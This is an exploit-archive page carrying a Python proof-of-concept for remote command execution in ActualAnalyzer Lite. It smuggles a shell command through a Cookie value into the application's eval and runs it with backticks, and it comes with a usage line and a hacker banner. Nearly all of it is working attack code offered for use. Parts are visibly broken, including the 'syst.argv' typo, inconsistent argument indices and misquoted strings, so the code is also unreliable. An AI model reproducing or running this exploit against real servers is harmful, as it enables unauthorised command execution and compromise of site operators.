Home / exploits ActualAnalyzer Remote Command Execution
Posted on 29 August 2014
############################### # ActualAnalyzer exploit. # Tested on Lite version # We load command into a dummy variable as we only have 6 characters to own the eval # but load more as first 2 characters get rm'd. # We then execute the eval with backticks. # 11/05/2011 ############################## import urllib import urllib2 import sys import time def banner(): print " ____ __ __ __ " print " / __/_ ______ _ ____ ______/ /___ ______ _/ /___ _____ ____ _/ /_ ______ ___ _____" print " / /_/ / / / __ `// __ `/ ___/ __/ / / / __ `/ / __ `/ __ / __ `/ / / / /_ / / _ / ___/" print " / __/ /_/ / /_/ // /_/ / /__/ /_/ /_/ / /_/ / / /_/ / / / / /_/ / / /_/ / / /_/ __/ / " print " /_/ \__,_/\__, (_)__,_/\___/\__/\__,_/\__,_/_/\__,_/_/ /_/\__,_/_/\__, / /___/\___/_/ " print " /_/ /____/ " def usage(): print " [+] Usage:" print " [-] python " + sys.argv[0] + " -h vulnHOST -d analyticdomain -c "command"" print " [-] python fuq.actualanalyzer.py -h test.com/lite -d analyticdomain -c "touch /tmp/123"" banner() if len(sys.argv) < 6: usage() quit() domain = sys.argv[2] command = sys.argv[6] host = syst.argv[4] def commandexploit(domain,host,command): url = 'http://' + domain + '/aa.php?anp=' + host data = None headers = {'Cookie': "ant=" + command + "; anm=414.`$cot`"} exploit1 = urllib2.Request(url,data,headers) exploit2 = urllib2.urlopen(exploit1) commandexploit(domain,host,command)
